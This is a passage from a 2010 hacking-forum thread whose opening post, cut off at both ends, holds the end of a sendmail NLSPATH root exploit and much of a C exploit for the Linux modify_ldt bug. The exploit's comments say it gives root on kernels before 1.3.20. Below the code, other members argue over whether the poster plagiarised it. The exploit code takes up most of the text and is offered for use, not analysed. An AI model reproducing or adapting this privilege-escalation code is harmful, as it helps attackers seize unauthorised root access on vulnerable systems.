printf("SENDMAIL exploit discovered by me, _PHANTOM_ in 1997\n");
setenv("NLSPATH",buff,1);
execl(path, "sendmail",NULL);

} MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT) !!!) /* this is a hack of a hack. a valid System.map was needed to get this sploit to werk.. but not any longer.. This sploit will give you root if the modify_ldt bug werks.. which I beleive it does in any kernel before 1.3.20 ..
QuantumG */ /* original code written by Morten Welinder. ** this required 2 hacks to work on the 1.2.13 kernel that I've tested on: * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed.
* 2. the _task in the System.map file has no leading underscore.
* I am not sure at what point these were changed, if you are
* using this on a newer kernel compile with NEWERKERNEL defined.
*

-ReD */ #include <linux/ldt.h>
#include <stdio.h>
#include <linux/unistd.h>
#include <signal.h>
#ifdef NEWERKERNEL
#include <asm/sigcontext.h>
#endif
#define __KERNEL__
#include <linux/sched.h>
#include <linux/module.h>

static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long,
bytecount)

#define KERNEL_BASE 0xc0000000
/*------------------------------------------------------------------------ */
static __inline__ unsigned char
__farpeek (int seg, unsigned ofs)
{

unsigned char res; asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
: "=a" (res)
: "r" (seg), "r" (ofs));

return res; }/*------------------------------------------------------------------------ */ static __inline__ void
__farpoke (int seg, unsigned ofs, unsigned char b)
{

asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
: /* No results. */
: "r" (seg), "r" (ofs), "r" (b));

}/*------------------------------------------------------------------------ */ void memgetseg (void *dst, int seg, const void *src, int size) { while (size-- > 0) *(char *)dst++ = __farpeek (seg, (unsigned)(src++)); }/*------------------------------------------------------------------------ */ void
memputseg (int seg, void *dst, const void *src, int size)
{

while (size-- > 0) __farpoke (seg, (unsigned)(dst++), *(char *)src++); }/*------------------------------------------------------------------------ */ int main () {
int stat, i,j,k;
struct modify_ldt_ldt_s ldt_entry;
FILE *syms;
char line[100];
struct task_struct **task, *taskptr, thistask;
struct kernel_sym blah[4096];

printf ("Bogusity checker for modify_ldt system call.\n"); printf ("Testing for page-size limit bug...\n");
ldt_entry.entry_number = 0;
ldt_entry.base_addr = 0xbfffffff;
ldt_entry.limit = 0;
ldt_entry.seg_32bit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
ldt_entry.read_exec_only = 0;
ldt_entry.limit_in_pages = 1;
ldt_entry.seg_not_present = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)

/* Continue after reporting error. */ printf ("This bug has been fixed in your kernel.\n"); else {
printf ("Shit happens: ");
printf ("0xc0000000 - 0xc0000ffe is accessible.\n");

} printf ("Testing for expand-down limit bug...\n");
ldt_entry.base_addr = 0x00000000;
ldt_entry.limit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
ldt_entry.limit_in_pages = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)

{
printf ("This bug has been fixed in your kernel.\n");
return 1;

} else { printf ("Shit happens: ");

Lmao Wtf is this? XDDDDD
Where did you copy this source?
Back to top Go down
View user profile http://merked-x.co.nr
NegativeInfluence
Noob
Noob
avatar

Posts : 18
Join date : 2010-08-06

PostSubject: Re: Hacking a website only peoplein this forum will know   Thu Aug 19, 2010 2:56 am

I actually didn't copy you can call me a lier but as long as i keep my word you can STFU now what tempest
Back to top Go down
View user profile
x-Pain-x
SPECIAL
SPECIAL
avatar

Posts : 115
Join date : 2010-07-30
Age : 21
Location : Your house.

PostSubject: Re: Hacking a website only peoplein this forum will know   Thu Aug 19, 2010 6:37 am

NegativeInfluence wrote:
I actually didn't copy you can call me a lier but as long as i keep my word you can STFU now what tempest


Rofl. I'm not stupid. I know who you are. You're wayyyy to retarded to even know what 90% of that code even means.

Roflmao. Did you copy the source from a hack forums or something? Rolling Eyes

Alright, if you have any idea what you're talking about, What does the word "Null" mean?
Back to top Go down
View user profile http://merked-x.co.nr
Tobi
Founder
Founder
avatar

Posts : 168
Join date : 2010-07-14
Location : Behind you!

PostSubject: Re: Hacking a website only peoplein this forum will know   Sat Aug 28, 2010 12:03 pm

Guys, take it easy. no fights. Also the code looks pretty complicated.
Back to top Go down
View user profile http://prohaxbase.heavenforum.com
K3nny
SPECIAL
SPECIAL


Posts : 16
Join date : 2010-08-31

PostSubject: Re: Hacking a website only peoplein this forum will know   Tue Aug 31, 2010 4:45 pm

I've seen that EXACT tutorial 10+ places. Give credit where credit is due. Its originally from Casihacks. CH may be dead, but you should still give credit and don't claim as yours. That should be a bannable offense.
Back to top Go down
View user profile
Tobi
Founder
Founder
avatar

Posts : 168
Join date : 2010-07-14
Location : Behind you!

PostSubject: Re: Hacking a website only peoplein this forum will know   Wed Sep 01, 2010 10:10 am

K3nny wrote:
I've seen that EXACT tutorial 10+ places. Give credit where credit is due. Its originally from Casihacks. CH may be dead, but you should still give credit and don't claim as yours. That should be a bannable offense.
I also saw allot of similar tutorials.
Back to top Go down
View user profile http://prohaxbase.heavenforum.com
Sponsored content




PostSubject: Re: Hacking a website only peoplein this forum will know   

Back to top Go down
 
Hacking a website only peoplein this forum will know
Back to top 
Page 1 of 1
 Similar topics
-
» Why JKSB website doesn't work during trading hours?
» Nation Lanka resurrects subsidiary CICL
» How to find sector P/E via DFN or CSE.LK
» CSE web site ekata moko me wela tiyenne
» Colonial Motors (COLO.N0000) - EPS 127.41

Permissions in this forum:You cannot reply to topics in this forum
PRO HAX BASE :: Programming :: Tutorials-
Jump to: